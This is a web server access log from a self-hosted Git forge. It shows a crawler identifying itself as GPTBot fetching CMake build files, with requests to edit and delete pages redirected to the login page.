"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:18:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:18:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11101] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9870] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:18:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 955] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 965] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:46:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:46:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9864] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:18:46:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:46:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 981] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:46:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42718] [Gzip 19.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 1001] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:46:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:46:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:46:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9876] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9889] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 993] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:46:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43373] [Gzip 19.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:46:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:46:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:46:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43362] [Gzip 19.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:46:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9884] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:46:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9862] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:46:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:46:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11095] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:46:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:46:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:46:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 1533] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:46:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9863] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:18:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9864] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:46:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:46:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:46:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:46:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:46:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:46:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15658] [Gzip 8.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9868] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 963] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:46:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:18:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:18:46:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 